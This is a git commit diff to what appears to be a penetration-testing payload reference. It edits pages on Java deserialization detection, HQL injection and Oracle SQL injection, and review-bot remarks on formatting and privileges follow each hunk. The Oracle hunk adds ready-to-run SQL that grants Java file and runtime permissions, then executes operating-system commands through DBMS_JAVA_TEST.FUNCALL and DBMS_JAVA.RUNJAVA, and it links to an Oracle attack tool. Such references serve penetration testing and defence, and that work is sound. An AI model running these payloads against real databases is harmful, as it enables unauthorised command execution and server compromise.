Oracle SQL

Swissky 2022-09-13 22:04:21 +02:00
parent 0ca060c049
commit c7dd67986c
3 changed files with 38 additions and 5 deletions

View File

@ -2,10 +2,12 @@
## Detection
- "AC ED 00 05" in Hex
- "rO0" in Base64
- `"AC ED 00 05"` in Hex
* `AC ED`: STREAM_MAGIC. Specifies that this is a serialization protocol.
* `00 05`: STREAM_VERSION. The serialization version.
- `"rO0"` in Base64
- Content-type = "application/x-java-serialized-object"
- "H4sIAAAAAAAAAJ" in gzip(base64)
- `"H4sIAAAAAAAAAJ"` in gzip(base64)
## Exploit
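Review bot: the two explanatory sub-bullets under the `"AC ED 00 05"` item use `*` while the rest of the list uses `-`, and as they appear here they are not indented, so Markdown will render them as sibling items rather than as children of that entry; indent them two spaces and use the same `-` marker. The `"H4sIAAAAAAAAAJ"` item deserves the same kind of sub-bullet as the others: `H4sI` is only the base64 form of the gzip header bytes, so that pattern identifies a gzip-compressed stream, not Java serialization as such, and the decompressed content still needs the `AC ED 00 05` check before it is treated as a serialized object.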

View File

@ -15,6 +15,8 @@
* [Methods by DBMS](#methods-by-dbms)
* [References](#references)
:warning: Your input will always be between the percentage symbols: `%INJECT_HERE%`
## HQL Comments
```sql
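Review bot: the new `:warning:` line sits directly between the last TOC entry (`* [References](#references)`) and the `## HQL Comments` heading with no blank line on either side, which in Markdown attaches it to the list block; add a blank line before and after it. Also confirm that a `## Methods by DBMS` heading exists further down the file so the new `#methods-by-dbms` TOC anchor actually resolves.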
@ -134,7 +136,7 @@ public class Constants {
Some usable constants in well-known Java libraries:
```
```ps1
org.apache.batik.util.XMLConstants.XML_CHAR_APOS [ Apache Batik ]
com.ibm.icu.impl.PatternTokenizer.SINGLE_QUOTE [ ICU4J ]
jodd.util.StringPool.SINGLE_QUOTE [ Jodd ]
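Review bot: `ps1` is the wrong fence language for this block; the lines are fully qualified Java constant names (`org.apache.batik.util.XMLConstants.XML_CHAR_APOS`, `com.ibm.icu.impl.PatternTokenizer.SINGLE_QUOTE`, `jodd.util.StringPool.SINGLE_QUOTE`), not PowerShell, so tag the fence as `java` or leave it untagged rather than apply misleading PowerShell highlighting.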

View File

@ -77,10 +77,37 @@ SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) comment: -- /**/
```
## Oracle SQL Command execution
## Oracle SQL Command Execution
* [ODAT (Oracle Database Attacking Tool)](https://github.com/quentinhardy/odat)
### Oracle Java Execution
* List Java privileges
```sql
select * from dba_java_policy
select * from user_java_policy
```
* Grant privileges
```sql
exec dbms_java.grant_permission('SCOTT', 'SYS:java.io.FilePermission','<<ALL FILES>>','execute');
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');
exec dbms_java.grant_permission('SCOTT','SYS:java.lang.RuntimePermission', 'readFileDescriptor', '');
```
* Execute commands
* 10g R2, 11g R1 and R2: `DBMS_JAVA_TEST.FUNCALL()`
```sql
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','c:\\windows\\system32\\cmd.exe','/c', 'dir >c:\test.txt') FROM DUAL
SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','/bin/ls>/tmp/OUT2.LST') from dual
```
* 11g R1 and R2: `DBMS_JAVA.RUNJAVA()`
```sql
SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper /bin/bash -c /bin/ls>/tmp/OUT.LST') FROM DUAL
```
### Oracle Java Class
```sql
/* create Java class */
BEGIN
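Review bot: the `Grant privileges` step does not say what the caller needs in order to run `dbms_java.grant_permission`; add a sentence stating that it requires a privileged account (JAVA_ADMIN or equivalent DBA rights), and note that the `dba_java_policy` / `user_java_policy` queries listed just above are also where such grants show up, which is the natural place for an administrator to audit them. Minor: the new SQL statements drop the trailing `;` used elsewhere in the file (`... WHERE column_name LIKE '%PASS%';`), and the Windows path escaping is inconsistent within one line (`c:\\windows\\system32\\cmd.exe` uses doubled backslashes, `c:\test.txt` does not).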
@ -112,3 +139,5 @@ SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
* [NetSpi - SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
* [ASDC12 - New and Improved Hacking Oracle From Web](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf)
* [Pentesting Oracle TNS Listener - HackTricks](https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener)
* [ODAT: Oracle Database Attacking Tool](https://github.com/quentinhardy/odat/wiki/privesc)
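Review bot: ODAT is now linked twice on this page under two different titles, `ODAT (Oracle Database Attacking Tool)` in the command-execution section and `ODAT: Oracle Database Attacking Tool` here, and this second link points at the wiki's privesc page rather than the repository; use one consistent title and make this reference say it is the privilege-escalation wiki page so the two entries are distinguishable.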